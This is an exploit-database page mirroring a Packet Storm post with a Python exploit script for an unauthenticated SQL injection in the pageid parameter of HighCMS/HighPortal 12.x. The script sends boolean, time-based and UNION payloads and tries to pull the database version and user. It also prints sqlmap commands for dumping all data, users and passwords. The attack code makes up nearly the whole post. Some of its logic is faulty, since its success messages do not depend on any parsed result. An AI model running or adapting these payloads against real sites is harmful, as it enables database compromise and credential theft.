Vulners
Lucene search
π HighPortal 12.x SQL Injection
ποΈΒ 17 Dec 2025Β 00:00:00Reported byΒ indoushkaTypeΒ 
Β packetstormπΒ packetstorm.newsπΒ 159Β Views
=============================================================================================================================================
| # Title : HighPortal v12.x SQL Injection Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://aryanic.com/ |
=============================================================================================================================================
POC :
[+] References : https://packetstorm.news/files/id/167170/
[+] Summary :
a critical SQL Injection vulnerability in HighCMS/HighPortal version 12.x.
The vulnerability allows unauthenticated attackers to execute arbitrary SQL queries through the pageid parameter, potentially leading to complete database compromise.
[+] POC : python poc.py
#!/usr/bin/env python3
"""
HighCMS/HighPortal v12.x SQL Injection Exploit
Author: indoushka
Vulnerability: SQL Injection in pageid parameter
"""
import requests
import sys
import urllib3
from argparse import ArgumentParser
# Disable SSL warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
class HighCMSExploit:
def __init__(self, target):
self.target = target.rstrip('/')
self.session = requests.Session()
self.session.headers.update({
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Connection': 'keep-alive'
})
def check_vulnerability(self):
"""Check if target is vulnerable to SQL Injection"""
print(f"[*] Checking vulnerability for: {self.target}")
# Test payloads
test_payloads = [
"6528' AND '1'='1",
"6528' AND '1'='2",
"6528' AND SLEEP(5)--",
"6528 UNION SELECT 1,2,3,4,5--"
]
vulnerable = False
for payload in test_payloads:
url = f"{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid={payload}"
try:
# Time-based SQL injection test
if "SLEEP" in payload:
import time
start_time = time.time()
response = self.session.get(url, timeout=10, verify=False)
end_time = time.time()
if end_time - start_time >= 5:
print(f"[+] Time-based SQL Injection confirmed! (Delay: {end_time - start_time:.2f}s)")
vulnerable = True
break
else:
response = self.session.get(url, timeout=10, verify=False)
# Check for error-based indicators
error_indicators = [
"SQL syntax",
"Microsoft OLE DB Provider",
"ODBC Driver",
"SQLServer",
"Unclosed quotation mark",
"syntax error"
]
for error in error_indicators:
if error.lower() in response.text.lower():
print(f"[+] Error-based SQL Injection confirmed!")
print(f"[+] Payload: {payload}")
vulnerable = True
break
# Boolean-based test
if "'1'='1" in payload and response.status_code == 200:
true_response = response.text
if "'1'='2" in payload and response.status_code == 200:
false_response = response.text
if true_response != false_response:
print(f"[+] Boolean-based SQL Injection confirmed!")
vulnerable = True
break
except Exception as e:
print(f"[-] Error testing payload {payload}: {e}")
continue
return vulnerable
def exploit_union(self, columns=5):
"""Exploit using UNION-based SQL injection"""
print(f"[*] Attempting UNION-based exploitation with {columns} columns")
# Test different column counts
for col_count in range(1, columns + 1):
nulls = ','.join(['NULL'] * col_count)
payload = f"6528 UNION SELECT {nulls}--"
url = f"{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid={payload}"
try:
response = self.session.get(url, timeout=10, verify=False)
if response.status_code == 200 and "error" not in response.text.lower():
print(f"[+] UNION injection successful with {col_count} columns")
# Now extract data
self.extract_data(col_count)
return True
except Exception as e:
print(f"[-] Error with {col_count} columns: {e}")
return False
def extract_data(self, column_count):
"""Extract database information"""
print("[*] Extracting database information...")
# Get database version
version_payloads = [
"6528 UNION SELECT 1,@@version,3,4,5--",
"6528 UNION SELECT 1,version(),3,4,5--",
"6528 UNION SELECT 1,banner,3,4,5 FROM v$version--"
]
for payload in version_payloads:
url = f"{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid={payload}"
try:
response = self.session.get(url, timeout=10, verify=False)
if response.status_code == 200:
# Look for version information in response
print("[+] Database version information extracted")
break
except:
continue
# Get current database user
user_payload = f"6528 UNION SELECT 1,user(),3,4,5--"
url = f"{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid={user_payload}"
try:
response = self.session.get(url, timeout=10, verify=False)
print("[+] Current user information extracted")
except:
pass
def generate_sqlmap_command(self):
"""Generate sqlmap command for automated exploitation"""
sqlmap_cmd = f'sqlmap -u "{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=6528" --batch --level=5 --risk=3'
print("\n[+] SQLMap Commands:")
print("=" * 50)
print("# Basic detection:")
print(f'sqlmap -u "{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=6528" --batch')
print("\n# Full database dump:")
print(f'sqlmap -u "{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=6528" --batch --dump-all')
print("\n# Get database users:")
print(f'sqlmap -u "{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=6528" --batch --users')
print("\n# Get database passwords:")
print(f'sqlmap -u "{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=6528" --batch --passwords')
def main():
banner = """
βββββββ ββββββββββ βββββββ βββ ββββββββββββββ ββββββ βββ ββββββ
ββββββββ βββββββββββββββββββββββ ββββββββββββββ ββββββ ββββββββββββ
βββββββββ βββββ ββββββ ββββββ ββββββββββββββββββββββββββ ββββββββ
ββββββββββββββββββββββββ ββββββ ββββββββββββββββββββββββββ ββββββββ
ββββββ βββββββββββββββββββββββββββββββββββββββββββ ββββββ ββββββ βββ
ββββββ ββββββββββββ βββββββ βββββββ βββββββββββ ββββββ ββββββ βββ
HighCMS/HighPortal v12.x SQL Injection Exploit
By: indoushka
"""
print(banner)
parser = ArgumentParser(description='HighCMS SQL Injection Exploit')
parser.add_argument('-u', '--url', required=True, help='Target URL (e.g., https://example.com)')
parser.add_argument('--check', action='store_true', help='Check vulnerability only')
parser.add_argument('--exploit', action='store_true', help='Run full exploitation')
parser.add_argument('--sqlmap', action='store_true', help='Generate sqlmap commands')
args = parser.parse_args()
exploit = HighCMSExploit(args.url)
if args.check:
if exploit.check_vulnerability():
print("\n[!] Target is VULNERABLE to SQL Injection")
else:
print("\n[!] Target does not appear to be vulnerable")
elif args.exploit:
if exploit.check_vulnerability():
print("\n[*] Starting exploitation...")
exploit.exploit_union()
elif args.sqlmap:
exploit.generate_sqlmap_command()
else:
# Default: check and provide options
if exploit.check_vulnerability():
print("\n[+] Vulnerability confirmed!")
print("\nAvailable options:")
print("1. Run full exploitation: python exploit.py -u TARGET --exploit")
print("2. Generate sqlmap commands: python exploit.py -u TARGET --sqlmap")
else:
print("\n[-] Target not vulnerable or not accessible")
if __name__ == "__main__":
if len(sys.argv) == 1:
print("Usage: python highcms_exploit.py -u https://target.com")
print("Options: --check, --exploit, --sqlmap")
sys.exit(1)
main()
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation withΒ Vulners data
WeΒ provide theΒ essential building blocks forΒ cybersecurity solutions withΒ comprehensive, structured, andΒ constantly updated vulnerability andΒ exploits data
Api
Power your application withΒ Vulners API
The Vulners REST API offers reliable, high-performance access toΒ vulnerabilityΒ intelligence, withΒ 99.9%Β SLAΒ uptime andΒ CDN-backed data delivery forΒ seamlessΒ global access
App
Assess and manage vulnerabilities withΒ VulnersΒ tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
17 Dec 2025 00:00Current
8.2High risk
Vulners AI Score8.2